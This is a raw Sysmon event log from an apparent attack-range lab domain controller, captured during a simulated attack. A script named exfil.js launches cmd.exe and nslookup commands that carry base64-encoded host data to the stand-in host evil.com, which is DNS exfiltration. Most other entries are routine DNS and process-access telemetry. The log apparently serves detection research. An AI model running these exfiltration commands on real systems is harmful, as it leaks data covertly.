354300x8000000000000000197091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.241{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52388- 354300x8000000000000000197090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52387- 354300x8000000000000000197089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52386- 354300x8000000000000000197088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52385- 354300x8000000000000000197087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.068{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52384- 354300x8000000000000000197086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.068{00000000-0000-0000-0000-000000000000}7544<unknown process>-udptruefalse127.0.0.1-52384-false127.0.0.1-53domain 354300x8000000000000000197085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.912{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52383- 354300x8000000000000000197084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.912{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52382- 354300x8000000000000000197083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.912{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52381- 354300x8000000000000000197082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.911{00000000-0000-0000-0000-000000000000}7212<unknown process>-udptruefalse127.0.0.1-52381-false127.0.0.1-53domain 354300x8000000000000000197081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.832{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56349-false10.0.1.12-8000- 354300x8000000000000000197080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.754{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52380- 354300x8000000000000000197079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.754{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52379- 354300x8000000000000000197078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.753{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52378- 354300x8000000000000000197077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.753{00000000-0000-0000-0000-000000000000}3596<unknown process>-udptruefalse127.0.0.1-52378-false127.0.0.1-53domain 10341000x8000000000000000197076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.204{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-093F-000000005F02}4616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.204{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-093F-000000005F02}4616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.204{2E1864BB-17B3-629A-093F-000000005F02}46165184C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-083F-000000005F02}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-093F-000000005F02}4616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.183{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-083F-000000005F02}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.167{2E1864BB-17A1-629A-783D-000000005F02}55527280C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-083F-000000005F02}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.182{2E1864BB-17B3-629A-083F-000000005F02}3744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxmif.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.167{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqoatn.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-17B3-629A-063F-000000005F02}55926580C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-073F-000000005F02}3644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-073F-000000005F02}3644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-17B3-629A-053F-000000005F02}72087904C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-073F-000000005F02}3644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.136{2E1864BB-17B3-629A-073F-000000005F02}3644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-053F-000000005F02}7208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqoatn.tmp 2>&1 10341000x8000000000000000197056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.104{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-063F-000000005F02}5592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.104{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-063F-000000005F02}5592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.104{2E1864BB-17B3-629A-063F-000000005F02}55926580C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-053F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-063F-000000005F02}5592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-053F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 